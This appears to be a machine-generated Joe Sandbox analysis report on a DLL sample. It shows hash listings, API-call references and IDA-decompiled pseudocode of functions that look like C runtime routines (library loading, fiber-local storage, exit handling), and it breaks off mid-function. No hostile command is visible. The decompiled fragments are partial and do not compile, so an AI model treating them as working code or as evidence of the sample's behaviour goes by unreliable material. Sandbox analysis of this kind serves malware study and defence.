                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                        • String ID: -$0$f$p$p
                                                                                                        • API String ID: 3215553584-1865143739
                                                                                                        • Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                        • Instruction ID: a2e378d4f75e0e48cf74f00427c5f748fddad8fa22feda2281feba31f15372f7
                                                                                                        • Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                        • Instruction Fuzzy Hash: F412C36DE09A6F85FB20AA14E0042F9665AFBD0764FC44172E68D476C4DFBCF462CB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                        • String ID:
                                                                                                        • API String ID: 1917832262-0
                                                                                                        • Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                        • Instruction ID: be943ebc6bd0f2fcc224cb4f94adc0a8ab384bfdd02e028c0347191870de3883
                                                                                                        • Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                        • Instruction Fuzzy Hash: BB91FC7A618A448ADB65CB28E05176AF7A5F7C8784F104226DACE97B68DF3CD449CF00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E00007FFC7FFC123DD8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                        				void* _t37;
                                                                                                        				signed long long _t57;
                                                                                                        				intOrPtr _t61;
                                                                                                        				signed long long _t72;
                                                                                                        				void* _t75;
                                                                                                        				signed long long _t76;
                                                                                                        				long long _t82;
                                                                                                        				void* _t86;
                                                                                                        				signed long long _t90;
                                                                                                        				signed long long _t91;
                                                                                                        				WCHAR* _t93;
                                                                                                        				long _t96;
                                                                                                        				void* _t99;
                                                                                                        				WCHAR* _t104;
                                                                                                        
                                                                                                        				 *((long long*)(_t86 + 8)) = __rbx;
                                                                                                        				 *((long long*)(_t86 + 0x10)) = _t82;
                                                                                                        				 *((long long*)(_t86 + 0x18)) = __rsi;
                                                                                                        				r15d = __ecx;
                                                                                                        				_t90 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				_t76 = _t75 | 0xffffffff;
                                                                                                        				_t72 = _t90 ^  *(0x7ffc123d0000 + 0x7f840 + _t104 * 8);
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t72 == _t76) goto 0x123dda36;
                                                                                                        				if (_t72 == 0) goto 0x123dd959;
                                                                                                        				_t57 = _t72;
                                                                                                        				goto 0x123dda38;
                                                                                                        				if (__r8 == __r9) goto 0x123dda1b;
                                                                                                        				_t61 =  *((intOrPtr*)(0x7ffc123d0000 + 0x7f7a0 + __rsi * 8));
                                                                                                        				if (_t61 == 0) goto 0x123dd980;
                                                                                                        				if (_t61 != _t76) goto 0x123dda75;
                                                                                                        				goto 0x123dda07;
                                                                                                        				r8d = 0x800;
                                                                                                        				LoadLibraryExW(_t104, _t99, _t96);
                                                                                                        				if (_t57 != 0) goto 0x123dda55;
                                                                                                        				if (GetLastError() != 0x57) goto 0x123dd9f5;
                                                                                                        				_t14 = _t57 - 0x50; // -80
                                                                                                        				_t37 = _t14;
                                                                                                        				r8d = _t37;
                                                                                                        				if (E00007FFC7FFC123DF5B0(_t90) == 0) goto 0x123dd9f5;
                                                                                                        				r8d = _t37;
                                                                                                        				if (E00007FFC7FFC123DF5B0(_t90) == 0) goto 0x123dd9f5;
                                                                                                        				r8d = 0;
                                                                                                        				LoadLibraryExW(_t93, _t75);
                                                                                                        				if (_t57 != 0) goto 0x123dda55;
                                                                                                        				 *((intOrPtr*)(0x7ffc123d0000 + 0x7f7a0 + __rsi * 8)) = _t76;
                                                                                                        				if (__r8 + 4 != __r9) goto 0x123dd962;
                                                                                                        				_t91 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				asm("dec eax");
                                                                                                        				 *(0x7ffc123d0000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
                                                                                                        				return 0;
                                                                                                        			}

















                                                                                                        0x7ffc123dd8f0
                                                                                                        0x7ffc123dd8f5
                                                                                                        0x7ffc123dd8fa
                                                                                                        0x7ffc123dd90c
                                                                                                        0x7ffc123dd927
                                                                                                        0x7ffc123dd92e
                                                                                                        0x7ffc123dd938
                                                                                                        0x7ffc123dd940
                                                                                                        0x7ffc123dd946
                                                                                                        0x7ffc123dd94f
                                                                                                        0x7ffc123dd951
                                                                                                        0x7ffc123dd954
                                                                                                        0x7ffc123dd95c
                                                                                                        0x7ffc123dd965
                                                                                                        0x7ffc123dd970
                                                                                                        0x7ffc123dd975
                                                                                                        0x7ffc123dd97b
                                                                                                        0x7ffc123dd98d
                                                                                                        0x7ffc123dd993
                                                                                                        0x7ffc123dd99f
                                                                                                        0x7ffc123dd9ae
                                                                                                        0x7ffc123dd9b0
                                                                                                        0x7ffc123dd9b0
                                                                                                        0x7ffc123dd9b6
                                                                                                        0x7ffc123dd9c7
                                                                                                        0x7ffc123dd9c9
                                                                                                        0x7ffc123dd9dd
                                                                                                        0x7ffc123dd9df
                                                                                                        0x7ffc123dd9e7
                                                                                                        0x7ffc123dd9f3
                                                                                                        0x7ffc123dd9ff
                                                                                                        0x7ffc123dda0e
                                                                                                        0x7ffc123dda14
                                                                                                        0x7ffc123dda28
                                                                                                        0x7ffc123dda2e
                                                                                                        0x7ffc123dda54

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                        • API String ID: 3013587201-537541572
                                                                                                        • Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                        • Instruction ID: 1277d3d8771b832bbf6cc2b234296ecba44250c61bde8e712f659d7ba49778b3
                                                                                                        • Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                        • Instruction Fuzzy Hash: 7541D22EB19E6E41FA129B1698081F57299BF85BF0FC88135CD1D4B788DE7CE465C320
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 2506987500-0
                                                                                                        • Opcode ID: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
                                                                                                        • Instruction ID: e2effe98d87d9dc5264448f6107d877a3cf1a5cd0dbbc7a2d10c8059b1f8cc51
                                                                                                        • Opcode Fuzzy Hash: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
                                                                                                        • Instruction Fuzzy Hash: 2F21601CA0CEBE81F968573156452F9616A5FC47B0FC44674D87E0B6C6EDBCB471C220
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                        • String ID: CONOUT$
                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                        • Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                        • Instruction ID: 1303783840f770421fa7adeb12be0ab5c2167f84864ddf3d5bdc49c0a0b68446
                                                                                                        • Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                        • Instruction Fuzzy Hash: 8B11B125B18E6986F7508B12E8447A9B2A4FB88BF4F440334EA1E87794DFBCD874C754
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBA5B
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBA91
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBABE
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBACF
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBAE0
                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBAFB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 2506987500-0
                                                                                                        • Opcode ID: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
                                                                                                        • Instruction ID: fdfaf5066e2ae6911cd4c5a3d6f463fe435892df96c8ccceb7cbb5b60f3477b9
                                                                                                        • Opcode Fuzzy Hash: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
                                                                                                        • Instruction Fuzzy Hash: 7C115B2CB0CE7E81FA28673196552F9625A5F847B0FC44774E83E076C6EEACF461C620
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                        • Instruction ID: 531a27d0ef3f6a848a293fcbd6017ed95b90426d2a1b294a208ae83e2cbd8255
                                                                                                        • Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                        • Instruction Fuzzy Hash: A6F0A469A18F1A81FB144B14A4543F5A360EF887B0F840635C95D461E0CFBCD4A4C724
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 85%
                                                                                                        			E00007FFC7FFC123DEB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                        				signed int _t27;
                                                                                                        				signed int _t28;
                                                                                                        				signed int _t29;
                                                                                                        				signed int _t30;
                                                                                                        				signed int _t31;
                                                                                                        				signed int _t42;
                                                                                                        				signed int _t43;
                                                                                                        				signed int _t44;
                                                                                                        				signed int _t46;
                                                                                                        				void* _t51;
                                                                                                        
                                                                                                        				_a8 = __rbx;
                                                                                                        				_a16 = __rsi;
                                                                                                        				_t27 = __ecx & 0x0000001f;
                                                                                                        				if ((__ecx & 0x00000008) == 0) goto 0x123deb9a;
                                                                                                        				if (sil >= 0) goto 0x123deb9a;
                                                                                                        				E00007FFC7FFC123E1CEC(_t27, _t51);
                                                                                                        				_t28 = _t27 & 0xfffffff7;
                                                                                                        				goto 0x123debf1;
                                                                                                        				_t42 = 0x00000004 & dil;
                                                                                                        				if (_t42 == 0) goto 0x123debb5;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t42 >= 0) goto 0x123debb5;
                                                                                                        				E00007FFC7FFC123E1CEC(_t28, _t51);
                                                                                                        				_t29 = _t28 & 0xfffffffb;
                                                                                                        				goto 0x123debf1;
                                                                                                        				_t43 = dil & 0x00000001;
                                                                                                        				if (_t43 == 0) goto 0x123debd1;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t43 >= 0) goto 0x123debd1;
                                                                                                        				E00007FFC7FFC123E1CEC(_t29, _t51);
                                                                                                        				_t30 = _t29 & 0xfffffffe;
                                                                                                        				goto 0x123debf1;
                                                                                                        				_t44 = dil & 0x00000002;
                                                                                                        				if (_t44 == 0) goto 0x123debf1;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t44 >= 0) goto 0x123debf1;
                                                                                                        				if ((dil & 0x00000010) == 0) goto 0x123debee;
                                                                                                        				E00007FFC7FFC123E1CEC(_t30, _t51);
                                                                                                        				_t31 = _t30 & 0xfffffffd;
                                                                                                        				_t46 = dil & 0x00000010;
                                                                                                        				if (_t46 == 0) goto 0x123dec0b;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t46 >= 0) goto 0x123dec0b;
                                                                                                        				E00007FFC7FFC123E1CEC(_t31, _t51);
                                                                                                        				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                        			}













                                                                                                        0x7ffc123deb68
                                                                                                        0x7ffc123deb6d
                                                                                                        0x7ffc123deb7c
                                                                                                        0x7ffc123deb84
                                                                                                        0x7ffc123deb89
                                                                                                        0x7ffc123deb90
                                                                                                        0x7ffc123deb95
                                                                                                        0x7ffc123deb98
                                                                                                        0x7ffc123deb9f
                                                                                                        0x7ffc123deba2
                                                                                                        0x7ffc123deba4
                                                                                                        0x7ffc123deba9
                                                                                                        0x7ffc123debab
                                                                                                        0x7ffc123debb0
                                                                                                        0x7ffc123debb3
                                                                                                        0x7ffc123debb5
                                                                                                        0x7ffc123debb9
                                                                                                        0x7ffc123debbb
                                                                                                        0x7ffc123debc0
                                                                                                        0x7ffc123debc7
                                                                                                        0x7ffc123debcc
                                                                                                        0x7ffc123debcf
                                                                                                        0x7ffc123debd1
                                                                                                        0x7ffc123debd5
                                                                                                        0x7ffc123debd7
                                                                                                        0x7ffc123debdc
                                                                                                        0x7ffc123debe2
                                                                                                        0x7ffc123debe9
                                                                                                        0x7ffc123debee
                                                                                                        0x7ffc123debf1
                                                                                                        0x7ffc123debf5
                                                                                                        0x7ffc123debf7
                                                                                                        0x7ffc123debfc
                                                                                                        0x7ffc123dec03
                                                                                                        0x7ffc123dec21

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _set_statfp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1156100317-0
                                                                                                        • Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                        • Instruction ID: ed389dcea89579cab60383dccda5b00331274255d61b66539aba3abea1bc654f
                                                                                                        • Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                        • Instruction Fuzzy Hash: F411C42EE0CE3F01F66411A4D4563F918886FD8374EC40AB4FA6F462D6CEAC7865C134
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FFC123D9403,?,?,00000000,00007FFC123D969E,?,?,?,?,?,00007FFC123D962A), ref: 00007FFC123DBB33
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123D9403,?,?,00000000,00007FFC123D969E,?,?,?,?,?,00007FFC123D962A), ref: 00007FFC123DBB52
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123D9403,?,?,00000000,00007FFC123D969E,?,?,?,?,?,00007FFC123D962A), ref: 00007FFC123DBB7A
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123D9403,?,?,00000000,00007FFC123D969E,?,?,?,?,?,00007FFC123D962A), ref: 00007FFC123DBB8B
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123D9403,?,?,00000000,00007FFC123D969E,?,?,?,?,?,00007FFC123D962A), ref: 00007FFC123DBB9C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702945584-0
                                                                                                        • Opcode ID: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
                                                                                                        • Instruction ID: 7618589b8f0af28c810d924dce3d04b0a5157d3d5cc0699fd79788f38e0c6fa4
                                                                                                        • Opcode Fuzzy Hash: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
                                                                                                        • Instruction Fuzzy Hash: CF116D1CF0CE7E41FA6857315A422F9614A5FC47B4FC447B4D83D066DAEEACB421C620
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702945584-0
                                                                                                        • Opcode ID: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
                                                                                                        • Instruction ID: 4e3b8e300c0d031bb2e73bf718f5702e1c9bdef106970b446920a9b15d963653
                                                                                                        • Opcode Fuzzy Hash: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
                                                                                                        • Instruction Fuzzy Hash: 6211D61CA0CE6F41FD6CA23155562F9214A4FC4774FD447B5E83E0A2D2EDACB472D624
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 49%
                                                                                                        			E00007FFC7FFC123E0958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                        				void* __rdi;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				intOrPtr _t181;
                                                                                                        				signed int _t186;
                                                                                                        				signed int _t193;
                                                                                                        				signed int _t198;
                                                                                                        				void* _t212;
                                                                                                        				signed char _t213;
                                                                                                        				void* _t263;
                                                                                                        				signed long long _t264;
                                                                                                        				signed long long _t267;
                                                                                                        				long long _t269;
                                                                                                        				signed long long _t271;
                                                                                                        				long long _t276;
                                                                                                        				long long _t278;
                                                                                                        				long long _t280;
                                                                                                        				intOrPtr* _t289;
                                                                                                        				intOrPtr _t294;
                                                                                                        				long long _t295;
                                                                                                        				long long _t318;
                                                                                                        				void* _t326;
                                                                                                        				long long _t327;
                                                                                                        				void* _t328;
                                                                                                        				long long _t329;
                                                                                                        				long long _t331;
                                                                                                        				signed char* _t332;
                                                                                                        				signed char* _t333;
                                                                                                        				signed char* _t334;
                                                                                                        				intOrPtr* _t335;
                                                                                                        				void* _t336;
                                                                                                        				void* _t337;
                                                                                                        				signed long long _t338;
                                                                                                        				intOrPtr _t341;
                                                                                                        				signed long long _t343;
                                                                                                        				void* _t345;
                                                                                                        				intOrPtr* _t347;
                                                                                                        				intOrPtr _t351;
                                                                                                        				signed long long _t356;
                                                                                                        				signed long long _t359;
                                                                                                        				signed long long _t361;
                                                                                                        				void* _t364;
                                                                                                        				long long _t365;
                                                                                                        				long long _t367;
                                                                                                        				char _t368;
                                                                                                        				void* _t372;
                                                                                                        				signed char* _t373;
                                                                                                        				signed long long _t375;
                                                                                                        
                                                                                                        				_t263 = _t337;
                                                                                                        				_t336 = _t263 - 0x57;
                                                                                                        				_t338 = _t337 - 0xe0;
                                                                                                        				 *((long long*)(_t336 - 9)) = 0xfffffffe;
                                                                                                        				 *((long long*)(_t263 + 8)) = __rbx;
                                                                                                        				_t264 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				 *(_t336 + 0x17) = _t264 ^ _t338;
                                                                                                        				 *((long long*)(_t336 - 0x49)) = __r8;
                                                                                                        				_t289 = __rcx;
                                                                                                        				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
                                                                                                        				 *((long long*)(_t336 - 0x51)) = _t367;
                                                                                                        				 *(_t336 - 0x19) = __edx;
                                                                                                        				_t267 = __edx >> 6;
                                                                                                        				 *(_t336 - 0x59) = _t267;
                                                                                                        				 *(_t336 - 0x11) = __edx;
                                                                                                        				_t375 = __edx + __edx * 8;
                                                                                                        				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
